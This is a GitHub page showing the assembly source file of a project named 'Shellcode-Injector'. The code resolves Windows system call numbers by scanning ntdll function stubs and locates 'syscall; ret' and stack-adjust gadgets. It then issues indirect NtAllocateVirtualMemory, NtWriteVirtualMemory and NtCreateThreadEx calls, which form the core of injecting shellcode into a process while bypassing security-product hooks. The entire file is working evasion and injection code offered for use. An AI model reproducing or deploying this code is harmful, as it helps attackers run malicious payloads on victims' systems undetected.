Shellcode-Injector/Assembly.asm at main · vvswift/Shellcode-Injector · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
section .data

syscall_ret dq 0000000000000000h
add_rsp_ret dq 0000000000000000h

section .text

global GetSSNByFuncAddress
global Search_For_Syscall_Ret
global Search_For_Add_Rsp_Ret
global NtAllocateVirtualMemory_Callback
global NtCreateThreadEx_Callback
global NtWriteVirtualMemory_Callback

NtAllocateVirtualMemory_Callback:
    sub rsp, 0x78
    mov r15, add_rsp_ret
    mov r15, [r15]
    push r15
    mov rbx, rdx
    mov rcx, [rbx]
    mov rdx, [rbx + 0x8]
    mov r8, [rbx + 0x10]
    mov r9, [rbx + 0x18]
    mov r10, [rbx + 0x24]
    mov [rsp+0x30], r10
    mov r10, [rbx + 0x20]
    mov [rsp+0x28], r10
    mov r10, rcx
    mov r15, syscall_ret
    mov r15, [r15]
    mov rax, [rbx + 0x28]
    jmp r15

NtWriteVirtualMemory_Callback:
    sub rsp, 0x78
    mov r15, add_rsp_ret
    mov r15, [r15]
    push r15
    mov rbx, rdx
    mov rcx, [rbx]
    mov rdx, [rbx + 0x8]
    mov r8, [rbx + 0x10]
    mov r9, [rbx + 0x18]
    mov r10, [rbx + 0x20]
    mov [rsp+0x28], r10
    mov r10, rcx
    mov r15, syscall_ret
    mov r15, [r15]
    mov rax, [rbx + 0x28]
    jmp r15

NtCreateThreadEx_Callback:
    sub rsp, 0x78
    mov r15, add_rsp_ret
    mov r15, [r15]
    push r15
    mov rbx, rdx
    mov rcx, [rbx]
    mov rdx, [rbx + 0x8]
    mov r8, [rbx + 0x10]
    mov r9, [rbx + 0x18]
    mov r10, [rbx + 0x50]
    mov [rsp+0x58], r10
    mov r10, [rbx + 0x48]
    mov [rsp+0x50], r10
    mov r10, [rbx + 0x40]
    mov [rsp+0x48], r10
    mov r10, [rbx + 0x38]
    mov [rsp+0x40], r10
    mov r10, [rbx + 0x30]
    mov [rsp+0x38], r10
    mov r10, [rbx + 0x28]
    mov [rsp+0x30], r10
    mov r10, [rbx + 0x20]
    mov [rsp+0x28], r10
    mov r10, rcx
    mov r15, syscall_ret
    mov r15, [r15]
    mov rax, [rbx + 0x58]
    jmp r15

Search_For_Syscall_Ret:
    ; Search for Syscall + Ret
    mov rdx, rax
    add rdx, 1
    xor rbx, rbx
    xor rcx, rcx
    mov rcx, 00FFFFFF0000000000h
    mov rdi, [rdx]
    and rdi, rcx
    or rbx, rdi
    shr rbx, 28h
    cmp rbx, 1F0FC3h
    jne Search_For_Syscall_Ret + 3h
    mov r15, syscall_ret
    mov [r15], rdx
    xor r15, r15
    ret

Search_For_Add_Rsp_Ret:
    ; Search for add rsp, 78 + Ret
    mov rdx, rax
    add rdx, 1
    xor rbx, rbx
    xor rcx, rcx
    mov rcx, 0000FFFFFFFFFFh
    mov rdi, [rdx]
    and rdi, rcx
    or rbx, rdi
    mov r14, 00C378C48348h
    cmp rbx, r14
    jne Search_For_Add_Rsp_Ret + 3h
    mov r15, add_rsp_ret
    mov [r15], rdx
    ret

GetSSNByFuncAddress:
    mov ebx, 0xB8D18B4C
    mov rdx, 0x0
    mov rax, [rcx]
    cmp eax, ebx
    je GetSSNByFuncAddress + 0x1B
    add rcx, 0x20
    add rdx, 0x1
    jmp GetSSNByFuncAddress + 0xA
    mov rax, [rcx + 0x4]
    sub rax, rdx
    ret